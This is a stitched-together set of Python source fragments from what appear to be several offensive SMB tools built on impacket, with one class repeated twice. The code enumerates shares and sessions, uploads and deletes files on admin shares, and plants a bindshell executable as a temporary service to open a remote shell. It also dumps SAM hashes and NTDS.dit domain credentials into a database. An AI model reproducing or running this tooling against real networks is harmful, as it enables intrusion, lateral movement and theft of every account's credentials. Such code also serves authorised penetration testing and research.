resp = srvs.hNetrSessionEnum(self.__dce, NULL, NULL, 502)
for session in resp['InfoStruct']['SessionInfo']['Level502']['Buffer']:
print("Host: %15s, user: %5s, active: %5d, idle: %5d, type: %5s, transport: %s"
% (session['sesi502_cname'][:-1], session['sesi502_username'][:-1], session['sesi502_time'],
session['sesi502_idle_time'], session['sesi502_cltype_name'][:-1],
session['sesi502_transport'][:-1]))
self.__dce.disconnect()
def __share_info(self, share):
self.smb_transport('srvsvc')
self.__dce = self.trans.get_dce_rpc()
self.__dce.connect()
self.__dce.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareGetInfo(self.__dce, '%s\x00' % share, 2)
self.__dce.disconnect()
return resp
def check_share(self, share=None):
# logger.debug("Into check_share with share: %s, self.share is: %s and self.tid is: %s"
# % (share, self.share, self.tid))
if share:
self.use(share)
elif not share and (self.share is None or self.tid is None):
logger.warn('Share has not been specified, select one')
self.shares()
def is_writable_share(self, share):
_ = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
try:
self.use(share, False)
self.mkdir(_)
except:
pass
else:
self.rmdir(_)
return True
return False
def get_writable_share(self):
# Check we can write a directory on the shares, return the first writable one
for _ in self.smb.listShares():
share = _['shi1_netname'][:-1]
try:
share_info = self.__share_info(share)
except rpcrt.DCERPCException as _:
# traceback.print_exc()
logger.warning('Unable to query share: %s' % share)
continue
path = share_info['InfoStruct']['ShareInfo2']['shi2_path'][:-1]
if self.is_writable_share(share):
logger.info('Share %s %sis writable' % (share, "(%s) " % path if path else ""))
DataStore.share_path = path
return share
else:
logger.debug('Share %s %sis not writable' % (share, "(%s) " % path if path else ""))
return None
def shares(self):
shares = self.smb.listShares()
count = 0
for i in range(len(shares)):
count += 1
name = shares[i]['shi1_netname'][:-1]
self.shares_list.append(name)
comment = shares[i]['shi1_remark'][:-1]
share_type = shares[i]['shi1_type']
_ = self.__share_info(name)
max_uses = _['InfoStruct']['ShareInfo2']['shi2_max_uses'] # 4294967295L is unlimited
current_uses = _['InfoStruct']['ShareInfo2']['shi2_current_uses']
permissions = _['InfoStruct']['ShareInfo2']['shi2_permissions'] # impacket always returns always 0
path = _['InfoStruct']['ShareInfo2']['shi2_path']
print('[%d] %s (comment: %s)' % (count, name, comment))
print('\tPath: %s' % path)
print('\tUses: %d (max: %s)' % (current_uses, 'unlimited' if max_uses == 4294967295 else max_uses))
# print '\tType: %s' % share_type
# print '\tPermissions: %d' % permissions
msg = 'Which share do you want to connect to? (default: 1) '
limit = len(self.shares_list)
choice = read_input(msg, limit)
self.use(self.shares_list[choice - 1])
def use(self, share, display=True):
if not share:
raise missingShare('Share has not been specified')
if self.tid:
self.smb.disconnectTree(self.tid)
try:
self.share = share.strip('\x00')
self.tid = self.smb.connectTree(self.share)
self.pwd = '\\'
self.ls('', False)
except SessionError as e:
if not display:
pass
elif e.getErrorCode() == nt_errors.STATUS_BAD_NETWORK_NAME:
logger.warn('Invalid share name')
elif e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied')
else:
logger.warn('Unable to connect to share: %s' % (e.getErrorString(),))
def cd(self, path):
if not path:
return
self.check_share()
path = ntpath.normpath(path)
self.oldpwd = self.pwd
if path == '.':
return
elif path == '..':
sep = self.pwd.split('\\')
self.pwd = '\\'.join('%s' % s for s in sep[:-1])
return
if path[0] == '\\':
self.pwd = path
else:
self.pwd = ntpath.join(self.pwd, path)
# Let's try to open the directory to see if it's valid
try:
fid = self.smb.openFile(self.tid, self.pwd)
self.smb.closeFile(self.tid, fid)
logger.warn('File is not a directory')
self.pwd = self.oldpwd
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_FILE_IS_A_DIRECTORY:
return
elif e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied')
elif e.getErrorCode() == nt_errors.STATUS_OBJECT_NAME_NOT_FOUND:
logger.warn('File not found')
else:
logger.warn('Unable to change directory: %s' % (e.getErrorString(),))
self.pwd = self.oldpwd
def get_pwd(self):
print(ntpath.join(self.share, self.pwd))
def ls(self, path, display=True):
self.check_share()
if not path:
pwd = ntpath.join(self.pwd, '*')
else:
pwd = ntpath.join(self.pwd, path)
self.completion = []
pwd = ntpath.normpath(pwd)
try:
files = self.smb.listPath(self.share, pwd)
except SessionError as e:
if not display:
pass
elif e.getErrorCode() in (nt_errors.STATUS_OBJECT_NAME_NOT_FOUND, nt_errors.STATUS_NO_SUCH_FILE):
logger.warn('File not found')
else:
logger.warn('Unable to list files: %s' % (e.getErrorString(),))
return
for f in files:
if display is True:
print('%s %8s %10d %s' % (time.ctime(float(f.get_mtime_epoch())),
'<DIR>' if f.is_directory() > 0 else '',
f.get_filesize(), f.get_longname()))
self.completion.append((f.get_longname(), f.is_directory(), f.get_filesize()))
def lstree(self, path):
self.check_share()
if not path:
path = ntpath.basename(self.pwd)
self.cd('..')
for x in range(0, path.count('\\')):
print('| ')
print('%s' % os.path.basename(path.replace('\\', '/')))
self.ls('%s\\*' % path, display=False)
for identified_file, is_directory, size in self.completion:
if identified_file in ('.', '..'):
continue
if is_directory > 0:
self.lstree(ntpath.join(path, identified_file))
else:
for x in range(0, path.count('\\')):
print('| ')
print('|-- %s (%d bytes)' % (identified_file, size))
def cat(self, filename):
self.check_share()
filename = os.path.basename(filename)
self.ls(filename, display=False)
for identified_file, is_directory, size in self.completion:
if is_directory > 0:
continue
filepath = ntpath.join(self.pwd, identified_file)
logger.debug('Reading file %s (%d bytes)..' % (filepath, size))
try:
self.fid = self.smb.openFile(self.tid, filepath)
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied to %s' % identified_file)
elif e.getErrorCode() == nt_errors.STATUS_SHARING_VIOLATION:
logger.warn('Access denied to %s due to share access flags' % identified_file)
else:
logger.error('Unable to access file: %s' % (e.getErrorString(),))
continue
offset = 0
while 1:
try:
data = self.smb.readFile(self.tid, self.fid, offset)
data = data.decode("cp437")
print(data)
if len(data) == 0:
break
offset += len(data)
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_END_OF_FILE:
break
else:
logger.error('Unable to read file content: %s' % (e.getErrorString(),))
self.smb.closeFile(self.tid, self.fid)
def download(self, filename, path=None):
self.check_share()
basename = os.path.basename(filename)
if path is None:
path = '.'
else:
path = path.replace('\\', '/')
self.ls(basename, display=False)
for identified_file, is_directory, size in self.completion:
if is_directory > 0:
self.downloadtree(identified_file)
self.cd('..')
continue
filepath = ntpath.join(self.pwd, identified_file)
logger.debug('Downloading file %s (%d bytes)..' % (filepath, size))
try:
fh = open(os.path.join(path, identified_file), 'wb')
self.smb.getFile(self.share, filepath, fh.write)
fh.close()
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied to %s' % identified_file)
elif e.getErrorCode() == nt_errors.STATUS_SHARING_VIOLATION:
logger.warn('Access denied to %s due to share access flags' % identified_file)
else:
logger.error('Unable to download file: %s' % (e.getErrorString(),))
def downloadtree(self, path):
self.check_share()
if not path:
path = ntpath.basename(self.pwd)
self.cd('..')
basename = ntpath.basename(path)
normpath = path.replace('\\', '/')
self.cd(basename)
# Check if the provided path is not a directory (if so, then the
# working directory has not changed
if self.pwd == self.oldpwd:
self.download(basename)
return
logger.debug('Recreating directory %s' % self.pwd)
self.ls(None, display=False)
if not os.path.exists(normpath):
os.makedirs(normpath)
for identified_file, is_directory, size in self.completion:
if identified_file in ('.', '..'):
continue
if is_directory > 0:
self.downloadtree(ntpath.join(path, identified_file))
self.cd('..')
else:
self.download(identified_file, normpath)
def upload(self, pathname, destfile=None):
self.check_share()
if isinstance(pathname, string_types):
files = glob.glob(pathname)
else:
files = [pathname]
for filename in files:
try:
if isinstance(filename, string_types):
fp = open(filename, 'rb')
else:
fp = filename
except IOError:
logger.error('Unable to open file %s' % filename)
return False
if not destfile or len(files) > 1:
destfile = os.path.basename(filename)
destfile = ntpath.join(self.pwd, destfile)
if isinstance(filename, string_types):
logger.debug('Uploading file %s to %s..' % (filename, destfile))
try:
self.smb.putFile(self.share, destfile, fp.read)
except SessionError as e:
traceback.print_exc()
if e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied to upload %s' % destfile)
elif e.getErrorCode() == nt_errors.STATUS_SHARING_VIOLATION:
logger.warn('Access denied to upload %s due to share access flags' % destfile)
else:
logger.error('Unable to upload file: %s' % (e.getErrorString(),))
fp.close()
def rename(self, srcfile, destfile):
self.check_share()
srcfile = ntpath.join(self.pwd, ntpath.normpath(srcfile))
destfile = ntpath.join(self.pwd, ntpath.normpath(destfile))
self.smb.rename(self.share, srcfile, destfile)
def mkdir(self, path):
self.check_share()
path = ntpath.join(self.pwd, ntpath.normpath(path))
self.smb.createDirectory(self.share, path)
def rm(self, filename):
self.check_share()
filename = ntpath.join(self.pwd, ntpath.normpath(filename))
self.ls(filename, display=False)
for identified_file, is_directory, size in self.completion:
if is_directory > 0:
continue
filepath = ntpath.join(self.pwd, identified_file)
logger.debug('Removing file %s (%d bytes)..' % (filepath, size))
try:
self.smb.deleteFile(self.share, filepath)
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied to %s' % identified_file)
elif e.getErrorCode() == nt_errors.STATUS_SHARING_VIOLATION:
logger.warn('Access denied to %s due to share access flags' % identified_file)
else:
logger.error('Unable to remove file: %s' % (e.getErrorString(),))
def rmdir(self, path):
self.check_share()
path = ntpath.join(self.pwd, ntpath.normpath(path))
self.ls(path, display=False)
for identified_file, is_directory, _ in self.completion:
if is_directory <= 0:
continue
filepath = ntpath.join(self.pwd, identified_file)
logger.debug('Removing directory %s..' % filepath)
try:
self.smb.deleteDirectory(self.share, filepath)
except SessionError as e:
if e.getErrorCode() == nt_errors.STATUS_ACCESS_DENIED:
logger.warn('Access denied to %s' % identified_file)
elif e.getErrorCode() == nt_errors.STATUS_SHARING_VIOLATION:
logger.warn('Access denied to %s due to share access flags' % identified_file)
else:
logger.error('Unable to remove directory: %s' % (e.getErrorString(),))
def bindshell(self, port):
connected = False
srvname = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
local_file = os.path.join(keimpx_path, 'contrib', 'srv_bindshell.exe')
remote_file = '%s.exe' % ''.join([random.choice(string.ascii_lowercase) for _ in range(8)])
if not os.path.exists(local_file):
raise missingFile('srv_bindshell.exe not found in the contrib subfolder')
logger.info('Launching interactive OS shell')
logger.debug('Going to use temporary service %s' % srvname)
if not port:
port = 4445
elif not isinstance(port, int):
port = int(port)
self.deploy(srvname, local_file, port, remote_file)
logger.info('Connecting to backdoor on port %d, wait..' % port)
for counter in range(0, 3):
try:
time.sleep(1)
if str(sys.version.split()[0]) >= '2.6':
tn = Telnet(self.__dstip, port, 3)
else:
tn = Telnet(self.__dstip, port)
connected = True
tn.interact()
except (socket.error, socket.herror, socket.gaierror, socket.timeout) as e:
if connected is False:
warn_msg = 'Connection to backdoor on port %d failed (%s)' % (port, e)
if counter < 2:
warn_msg += ', retrying..'
logger.warn(warn_msg)
else:
logger.error(warn_msg)
except SessionError as e:
# traceback.print_exc()
logger.error('SMB error: %s' % (e.getErrorString(),))
except KeyboardInterrupt as _:
print()
logger.info('User aborted')
except Exception as e:
# traceback.print_exc()
logger.error(str(e))
if connected is True:
tn.close()
sys.stdout.flush()
break
time.sleep(1)
self.undeploy(srvname)
def getSecretsDumper(self, history):
dumper = DumpSecrets(remoteName=self.__destfile, remoteHost=self.__dstip, username=self.__user,
password=self.__password, domain=self.__domain, lmhash=self.__lmhash,
nthash=self.__nthash, history=history, ds=DataStore)
return dumper
def getAtExec(self, command):
if DataStore.version_major > 6:
atexec = TSCH_EXEC(self.__destfile if self.__destfile is not None else self.__dstip, username=self.__user,
password=self.__password, domain=self.__domain, lmhash=self.__lmhash,
nthash=self.__nthash, command=command)
return atexec
else:
logger.warn("This command only works on Windows Vista or newer.")
return None
def getRpcDump(self):
dumper = RPCDump(self.__destfile if self.__destfile is not None else self.__dstip, remoteHost=self.__dstip,
username=self.__user, password=self.__password, domain=self.__domain,
lmhash=self.__lmhash, nthash=self.__nthash)
return dumper
class SmbCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.auth = False
self.con = False
self.client = ''.join(
[choice(ascii_letters + digits) for x in range(7)])
self.smbv1 = False
self.os = ''
self.admin = False
self.signing = False
self.os_arch = '0'
self.remote_ops = None
self.bootkey = None
self.db = db
self.port = 445
#########################
# Session Management
#########################
def create_smb_con(self):
# Create SMB Con
if self.smb_connection():
self.host_info()
try:
# SMB Auth
self.con.login(self.username,
self.password,
self.domain,
lmhash=self.lmhash,
nthash=self.nthash)
self.auth = True
self.host_info()
self.isAdmin()
self.update_db()
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to Server Failed')
def update_db(self):
self.db.update_host(self.host, self.ip, self.domain, self.os,
self.signing)
if self.username and self.password or self.username and self.hash:
self.db.update_user(self.username, self.password, self.domain,
self.hash)
if self.admin:
self.db.update_admin(self.username, self.domain, self.host)
def logoff(self):
self.con.logoff()
def close(self):
try:
self.con.logoff()
except:
pass
try:
self.con.close()
except:
pass
#########################
# SMB Connection
#########################
def smb_connection(self):
if self.smbv1_con():
return True
elif self.smbv3_con():
return True
return False
def smbv1_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
preferredDialect=SMB_DIALECT,
timeout=int(self.timeout))
self.smbv1 = True
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
def smbv3_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
timeout=int(self.timeout))
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
#########################
# Authentication (NOT IN USE)
#########################
def set_host(self, local_auth):
# Get domain for authentication purposes
if local_auth:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
else:
self.domain = self.con.getServerDNSDomainName()
# Backup for Linux/Unix systems
if not self.domain:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
################################
# Enumerate Host information
################################
def host_info(self):
try:
self.srvdomain = self.get_domain()
self.host = self.get_hostname()
self.os = self.con.getServerOS()
self.signing = self.con.isSigningRequired()
arch = self.get_os_arch()
if arch == 32 or arch == 64:
self.os_arch = " x{}".format(str(arch))
else:
self.os_arch = ''
except Exception as e:
self.logger.debug("SMB Host Info: {}".format(str(e)))
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_hostname(self):
if self.con.getServerDNSDomainName() and not self.local_auth:
if self.con.getServerName().lower(
) != self.con.getServerDNSDomainName().lower():
return (self.con.getServerName() + "." +
self.con.getServerDNSDomainName())
else:
return self.con.getServerName()
else:
return self.con.getServerName()
def get_domain(self):
try:
return self.con.getServerDomain()
except:
return self.getServerName()
def list_shares(self):
# name=share['shi1_netname'][:-1], description=share['shi1_remark']
return self.con.listShares()
################################
# Host/Domain Password Policy
################################
def password_policy(self):
SAMRDump(self).dump(self.host)
################################
# List Shares & Check Share Permissions
################################
def read_perm(self, share):
try:
# Silently list path to check access
self.list_path(share, False)
return True
except:
return False
def write_perm(self, share):
try:
# Create dir to check write access
tmp = '.' + ''.join(
[choice(ascii_letters + digits) for x in range(5)])
self.con.createDirectory(share, tmp)
self.con.deleteDirectory(share, tmp)
return True
except Exception as e:
return False
def list_path(self, share, path):
if not path:
path = '/*'
return self.con.listPath(share, path)
################################
# Check if User Admin
################################
def isAdmin(self):
rpctransport = SMBTransport(self.host,
self.port,
r'\svcctl',
smb_connection=self.con)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
dce.bind(scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host),
'ServicesActive\x00', 0xF003F)
self.admin = True
return True
except scmr.DCERPCException as e:
pass
return False
################################
# Dump SAM / LSA
################################
def enable_remoteops(self):
# Source: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(
self.host, str(e)))
def sam(self):
try:
self.enable_remoteops()
def add_sam_hash(sam_hash, host_id):
self.logger.success(
[self.host, highlight("SAM HASH"), sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host_id,
"{}:{}".format(lmhash, nthash))
if self.remote_ops and self.bootkey:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName,
self.bootkey,
isRemote=True,
perSecretCallback=lambda secret: add_sam_hash(
secret, self.host))
SAM.dump()
except Exception as e:
self.logger.fail('SAM Extraction Failed for {}: {}'.format(
self.host, str(e)))
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(
"Error calling remote_ops.finish() for {}: {}".format(
self.host, str(e)))
SAM.finish()
################################
# File Interaction
################################
def createFile(self, filename, data, share='C$'):
# Create new file & write data, Not In Use
f = remotefile.RemoteFile(self.con, filename, share)
f.create()
f.write(data)
f.close()
def uploadFile(self, local_file, location, share='C$'):
f = open(local_file)
self.con.putFile(share, location, f.read)
f.close()
def downloadFile(self, remote_file, location='ar3_download', share='C$'):
f = open(location, 'wb')
self.con.getFile(share, remote_file, f.write)
f.close()
return
def deleteFile(self, remote_file, share='C$'):
self.con.deleteFile(share, remote_file)
class SmbCon(Connector):
def __init__(self, args, loggers, host, db):
Connector.__init__(self, args, loggers, host)
self.auth = False
self.con = False
self.client = ''.join(
[choice(ascii_letters + digits) for x in range(7)])
self.smbv1 = False
self.os = ''
self.admin = False
self.signing = False
self.os_arch = '0'
self.remote_ops = None
self.bootkey = None
self.db = db
self.port = 445
#########################
# Session Management
#########################
def create_smb_con(self):
# Create SMB Con
if self.smb_connection():
self.host_info()
try:
# SMB Auth
self.con.login(self.username,
self.password,
self.domain,
lmhash=self.lmhash,
nthash=self.nthash)
self.auth = True
self.host_info()
self.isAdmin()
self.update_db()
except Exception as e:
raise Exception(str(e))
else:
raise Exception('Connection to Server Failed')
def update_db(self):
self.db.update_host(self.host, self.ip, self.domain, self.os,
self.signing)
if self.username and self.password or self.username and self.hash:
self.db.update_user(self.username, self.password, self.domain,
self.hash)
if self.admin:
self.db.update_admin(self.username, self.domain, self.host)
def logoff(self):
self.con.logoff()
def close(self):
try:
self.con.logoff()
except:
pass
try:
self.con.close()
except:
pass
#########################
# SMB Connection
#########################
def smb_connection(self):
if self.smbv1_con():
return True
elif self.smbv3_con():
return True
return False
def smbv1_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
preferredDialect=SMB_DIALECT,
timeout=int(self.timeout))
self.smbv1 = True
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
def smbv3_con(self):
try:
self.con = SMBConnection(self.client,
self.host,
sess_port=self.port,
timeout=int(self.timeout))
self.con.setTimeout(self.timeout)
return True
except Exception as e:
return False
#########################
# Authentication (NOT IN USE)
#########################
def set_host(self, local_auth):
# Get domain for authentication purposes
if local_auth:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
else:
self.domain = self.con.getServerDNSDomainName()
# Backup for Linux/Unix systems
if not self.domain:
self.domain = self.con.getServerName(
) + "." + self.con.getServerDNSDomainName()
################################
# Enumerate Host information
################################
def host_info(self):
try:
self.srvdomain = self.get_domain()
self.host = self.get_hostname()
self.os = self.con.getServerOS()
self.signing = self.con.isSigningRequired()
arch = self.get_os_arch()
if arch == 32 or arch == 64:
self.os_arch = " x{}".format(str(arch))
else:
self.os_arch = ''
except Exception as e:
self.logger.debug("SMB Host Info: {}".format(str(e)))
def get_os_arch(self):
# Credit: https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# Credit: https://github.com/SecureAuthCorp/impacket/blob/impacket_0_9_19/examples/getArch.py
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(
MSRPC_UUID_PORTMAP,
transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36',
'1.0'))
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except:
return 0
def get_hostname(self):
if self.con.getServerDNSDomainName() and not self.local_auth:
if self.con.getServerName().lower(
) != self.con.getServerDNSDomainName().lower():
return (self.con.getServerName() + "." +
self.con.getServerDNSDomainName())
else:
return self.con.getServerName()
else:
return self.con.getServerName()
def get_domain(self):
try:
return self.con.getServerDomain()
except:
return self.getServerName()
def list_shares(self):
# name=share['shi1_netname'][:-1], description=share['shi1_remark']
return self.con.listShares()
################################
# Host/Domain Password Policy
################################
def password_policy(self):
SAMRDump(self).dump(self.host)
################################
# List Shares & Check Share Permissions
################################
def read_perm(self, share):
try:
# Silently list path to check access
self.list_path(share, False)
return True
except:
return False
def write_perm(self, share):
try:
# Create dir to check write access
tmp = '.' + ''.join(
[choice(ascii_letters + digits) for x in range(5)])
self.con.createDirectory(share, tmp)
self.con.deleteDirectory(share, tmp)
return True
except Exception as e:
return False
def list_path(self, share, path):
if not path:
path = '/*'
return self.con.listPath(share, path)
################################
# Check if User Admin
################################
def isAdmin(self):
rpctransport = SMBTransport(self.host,
self.port,
r'\svcctl',
smb_connection=self.con)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
dce.bind(scmr.MSRPC_UUID_SCMR)
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, '{}\x00'.format(self.host),
'ServicesActive\x00', 0xF003F)
self.admin = True
return True
except scmr.DCERPCException as e:
pass
return False
################################
# Dump SAM / LSA
# Methods were modified from:
# https://github.com/byt3bl33d3r/CrackMapExec/blob/master/cme/protocols/smb.py
# https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
################################
def enable_remoteops(self):
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.con, False, None)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail('RemoteOperations failed for {}: {}'.format(
self.host, str(e)))
def sam(self):
def add_sam_hash(sam_hash, host):
self.logger.success([self.host, self.ip, "SAM HASH", sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host,
"{}:{}".format(lmhash, nthash))
add_sam_hash.added_to_db += 1
try:
add_sam_hash.added_to_db = 0
self.enable_remoteops()
if self.remote_ops and self.bootkey:
SAMFileName = self.remote_ops.saveSAM()
SAM = SAMHashes(SAMFileName,
self.bootkey,
isRemote=True,
perSecretCallback=lambda secret: add_sam_hash(
secret, self.host))
SAM.dump()
except Exception as e:
self.logger.debug('SAM Extraction Failed for {}: {}'.format(
self.host, str(e)))
if add_sam_hash.added_to_db > 0:
self.logger.success([
self.host, self.ip, "SAM HASH",
'{} NTLM hashes added to the database'.format(
add_sam_hash.added_to_db)
])
try:
self.remote_ops.finish()
SAM.finish()
except Exception as e:
self.logger.debug(
["SAM", "Error calling remote_ops.finish(): {}".format(e)])
def ntds(self):
def add_ntds_hash(ntds_hash):
if ntds_hash.find('$') == -1:
if "CLEARTEXT" in ntds_hash:
try:
add_ntds_hash.clear_text += 1
username, password = ntds_hash.split(":CLEARTEXT:")
domain, username = username.split("\\")
self.db.update_user(username, '', domain, password)
add_ntds_hash.added_to_db += 1
except:
self.logger.fail(
"Error adding clear text cred to db: {}".format(
ntds_hash))
else:
if ntds_hash.find('\\') != -1:
domain, hash = ntds_hash.split('\\')
else:
domain = self.domain
hash = ntds_hash
try:
username, _, lmhash, nthash, _, _, _ = hash.split(':')
parsed_hash = ':'.join((lmhash, nthash))
if validate_ntlm(parsed_hash):
add_ntds_hash.ntds_hashes += 1
self.db.update_user(username, '', domain,
"{}:{}".format(lmhash, nthash))
add_ntds_hash.added_to_db += 1
except:
self.logger.debug(
"Skipping non-NTLM hash: {}".format(ntds_hash))
else:
self.logger.debug("Skipping computer account")
try:
self.enable_remoteops()
use_vss_method = self.args.use_vss
NTDSFileName = None
add_ntds_hash.ntds_hashes = 0
add_ntds_hash.clear_text = 0
add_ntds_hash.added_to_db = 0
outfile = os.path.join(os.path.expanduser('~'), '.ar3',
'workspaces', self.args.workspace,
self.domain)
if self.remote_ops and self.bootkey:
if self.args.ntds is 'vss':
NTDSFileName = self.remote_ops.saveNTDS()
use_vss_method = True
NTDS = NTDSHashes(NTDSFileName,
self.bootkey,
isRemote=True,
history=False,
noLMHash=True,
remoteOps=self.remote_ops,
useVSSMethod=use_vss_method,
justNTLM=False,
pwdLastSet=False,
resumeSession=None,
outputFileName=outfile,
justUser=None,
printUserStatus=False,
perSecretCallback=lambda secretType, secret:
add_ntds_hash(secret))
self.logger.info([
self.host, self.ip, "NTDS",
'Dumping NTDS.dit, this could take a minute'
])
NTDS.dump()
self.logger.success([
self.host, self.ip, "NTDS",
'{} NTLM hashes and {} clear text passwords collected'.
format(add_ntds_hash.ntds_hashes, add_ntds_hash.clear_text)
])
self.logger.success([
self.host, self.ip, "NTDS",
'{} creds added to the database'.format(
add_ntds_hash.added_to_db)
])
self.logger.info([
self.host, self.ip, "NTDS",
'Hash files located at: {}'.format(outfile)
])
else:
raise Exception("RemoteOps and BootKey not initiated")
except Exception as e:
self.logger.fail('NTDS Extraction Failed for {}: {}'.format(
self.host, str(e)))
try:
self.remote_ops.finish()
NTDS.finish()
except Exception as e:
self.logger.debug(
["NTDS", "Error calling remote_ops.finish(): {}".format(e)])
################################
# File Interaction
################################
def createFile(self, filename, data, share='C$'):
# Create new file & write data, Not In Use
f = remotefile.RemoteFile(self.con, filename, share)
f.create()
f.write(data)
f.close()
def uploadFile(self, local_file, location, share='C$'):
f = open(local_file)
self.con.putFile(share, location, f.read)
f.close()
def downloadFile(self, remote_file, location='ar3_download', share='C$'):
f = open(location, 'wb')
self.con.getFile(share, remote_file, f.write)
f.close()
return
def deleteFile(self, remote_file, share='C$'):
self.con.deleteFile(share, remote_file)
class ImpacketConnection:
class Options:
def __init__(self,
hostname="",
domain_name="",
username="",
password="",
lmhash="",
nthash="",
kerberos=False,
aesKey="",
dc_ip=None,
timeout=5):
self.hostname = hostname
self.domain_name = domain_name
self.username = username
self.password = password
self.lmhash = lmhash
self.nthash = nthash
self.timeout = timeout
self.kerberos = kerberos
self.aesKey = aesKey
self.dc_ip = dc_ip
def __init__(self, options: Options):
self.options = options
self.hostname = options.hostname
self.domain_name = options.domain_name
self.username = options.username
self.password = options.password
self.lmhash = options.lmhash
self.nthash = options.nthash
self.kerberos = options.kerberos
self.aesKey = options.aesKey
self.dc_ip = options.dc_ip
self.timeout = options.timeout
self._log = Logger(self.hostname)
self._conn = None
def get_logger(self):
return self._log
def set_logger(self, logger):
self._log = logger
def login(self):
try:
ip = list({
addr[-1][0]
for addr in getaddrinfo(self.hostname, 0, 0, 0, 0)
})[0]
if ip != self.hostname:
self._log.debug("Host {} resolved to {}".format(
self.hostname, ip))
except gaierror as e:
return RetCode(ERROR_DNS_ERROR, e)
try:
self._conn = SMBConnection(self.hostname, ip, timeout=self.timeout)
except Exception as e:
return RetCode(ERROR_CONNECTION_ERROR, e)
username = ''
if not self.kerberos:
username = self.username.split("@")[0]
self._log.debug("Authenticating against {}".format(ip))
else:
self._log.debug("Authenticating against {}".format(self.hostname))
try:
if not self.kerberos:
self._conn.login(username,
self.password,
domain=self.domain_name,
lmhash=self.lmhash,
nthash=self.nthash,
ntlmFallback=True)
else:
self._conn.kerberosLogin(username,
self.password,
domain=self.domain_name,
lmhash=self.lmhash,
nthash=self.nthash,
aesKey=self.aesKey,
kdcHost=self.dc_ip)
except SessionError as e:
self._log.debug("Provided credentials : {}\\{}:{}".format(
self.domain_name, username, self.password))
return RetCode(ERROR_LOGIN_FAILURE, e)
except KerberosException as e:
self._log.debug("Kerberos error")
return RetCode(ERROR_LOGIN_FAILURE, e)
except Exception as e:
return RetCode(ERROR_UNDEFINED, e)
return RetCode(ERROR_SUCCESS)
def connectTree(self, share_name):
return self._conn.connectTree(share_name)
def openFile(self, tid, fpath, timeout: int = 3):
self._log.debug("Opening file {}".format(fpath))
start = time.time()
while True:
try:
fid = self._conn.openFile(tid,
fpath,
desiredAccess=FILE_READ_DATA)
self._log.debug("File {} opened".format(fpath))
return fid
except Exception as e:
if str(e).find('STATUS_SHARING_VIOLATION') >= 0 or str(e).find(
'STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
# Output not finished, let's wait
if time.time() - start > timeout:
raise (Exception(e))
time.sleep(1)
else:
raise Exception(e)
